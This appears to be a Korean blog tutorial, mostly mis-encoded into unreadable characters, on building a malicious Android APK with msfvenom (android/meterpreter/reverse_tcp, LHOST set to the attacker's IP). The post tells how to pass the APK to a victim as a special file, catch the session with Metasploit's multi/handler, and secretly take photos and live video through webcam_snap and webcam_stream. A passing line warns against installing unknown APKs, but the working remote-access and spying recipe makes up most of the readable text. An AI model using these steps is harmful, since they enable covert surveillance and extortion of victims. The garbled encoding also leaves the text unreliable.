์์ฆ ๋ชธ์บ ์ด ์ ํ์ ํ์๋ค.
๋์ถฉ ์๋ฆฌ๋ฅผ ๋ณด๋ฉด ์ค์นดxx๊ฐ์ ๊ณณ์์ ์ฑํ ์ ํ๋ค๊ฐ ๋ชธ์บ ์ ํ์๊ณ ํ์ผ์ ๋ฐ์ผ๋ผ๊ณ ํ๋ค. (๋ชธ์บ ์ ํ๊ธฐ์ํ ์ ์ฉ ํ์ผ์ด๋ผ ๋ปฅ์ ์น๋ค.)
๊ทธ๋ฌ๊ณ ํ์ผ์ ๋ณด๋ด๋๋ฐ ๊ทธ ํ์ผ์ ๋น์ฐํ ์ ์ฑ์ฝ๋ !! :)
์ด์ ๊ทธ๊ฒ์ ์ฌ์ฐํด๋ณด์
๊ทธ์ ์ ๋ชจ๋ ์ฑ ์์ ์ฌ์ฉ์ ๋ณธ์ธ์๊ฒ ์์ต๋๋ค.
์์ํด๋ณด์ :X
๋จผ์ service apache2 start๋ก ์ํ์น๋ฅผ ์คํ ์์ผ์ฃผ๊ณ
service postgresql start ๋ก postgresql ๋ํ ์ํจ๋ค.
๊ถ๊ทน์ ์ธ ๋ช ๋ น์ด service metasploit start ๋ก metasploit ๋ํ ์คํ์ํจ๋ค.
๊ทธ ํ ์ด์ ์ ์ฑ์ฝ๋๋ฅผ ๋ง๋ค์ด์ผ ํ๋๋ฐ...
๋ช ๋ น์ด msfvenom์ ์ด์ฉ ํ์ฌ ๋ง๋ค์ด ๋ณด์.
msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker IP LPORT=ํ๊ณ ์ถ์ ํฌํธ๋ฒํธ R > filename.apk
์ด๋ ๊ฒ ํ๋ฉด ํ์ผ์ด /root ํด๋์ ํ์ผ์ด ๋ง๋ค์ด ์ ธ์๋ ๊ฒ์ ํ์ธ ํ ์ ์๋ค.
๊ทธ ํ์ผ์ ์ด์ ๋ชธ์บ ์ ์ฉํ์ผ์ด๋ผ๊ณ ๋ปฅ์ ์น๊ณ victim์๊ฒ ๋ณด๋ด์ด ์ค์น๋ฅผ ํ๊ฒ ํ๋ค.
๊ทธ๋ผ ๊ณต๊ฒฉ์ ์ชฝ์์๋ ํธ๋ค๋ฌ๋ฅผ ์ป์ด์ผ ํ๋
msfconsole์ ์ด์ฉํ์ฌ
use exploit/multi/handler
set payload [์๊น apkํ์ผ ๋ง๋ค๋ -p ํ๊ณ ๋ฃ์ ์ฝ๋]
set LHOST attacker IP
set LPORT [์๊น ํ๊ณ ์ถ์ ํฌํธ ๋ฒํธ apk๋ง๋ค๋๋ ๊ฐ์ ๋ฒํธ์ฌ์ผ ํ๋ค.]
exploit ํ๊ณ ๊ธฐ๋ค๋ฆฌ๋ฉด
apk๋ฅผ ์คํ ์ํค๋ฉด ์ด์ ๊ณต๊ฒฉ์๋ ๊ถํ์ ์ป๊ฒ ๋๋ค.
help ๋ฅผ ์ด์ฉํ์ฌ ๋ช ๋ น์ด๋ฅผ ๋ณด๋ฉด
์ฐ๋ฆฌ๋ ๋ชธ์บ ์ ํ ๊บผ๋ ํํํ
webcam ์์ฃผ๋ก ๋ณด๋ฉด ๋ ๊ฒ๊ฐ๋ค.
webcam_snap ๋ช ๋ น์ด๋ฅผ ์ฐ๋ฉด ์ฌ์ง์ ์ฐ์ด์ค๋ค. ์ปดํจํฐ๋ก ๊ฐ์ ์๋๋ก์ด๋ ํฐ์ ๋ง๋ค์ด ์นด๋ฉ๋ผ๊ฐ ์์ด ์ด๋ ๊ฒ ๋จ์ง๋ง ์ค์ ๋ก๋ ์ฐํ๋ค.
webcam_stream ๋ช ๋ น์ด๋ฅผ ์ฌ์ฉํ๋ฉด ์ค์๊ฐ์ผ๋ก ๋์์์ ์ฐ์ด ๋ณด์ฌ์ค๋ค.
์กฐ์ฌํ์... ํ๊ฐ๋์ง์๊ณ ์๋ฌด apk๋ ๋ฐ์ง๋ง์...
'Metasploit' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
Hack windows with metasploit Java Applet JMX Remote Code Execution (0) | 2016.12.22 |
---|---|
Heartbleed :) ํํธ๋ธ๋ฆฌ๋ (0) | 2016.12.21 |
ํ์ผํฉ์น๊ธฐ (์ ์ฑ์ฝ๋์๋ ํ์ผ๋ง๋ค๊ธฐ) (0) | 2016.05.24 |
๊ฐ์ง facebook๋ง๋ค๊ธฐ (5) | 2016.02.11 |
stagefright.py (0) | 2016.02.10 |
๋๊ธ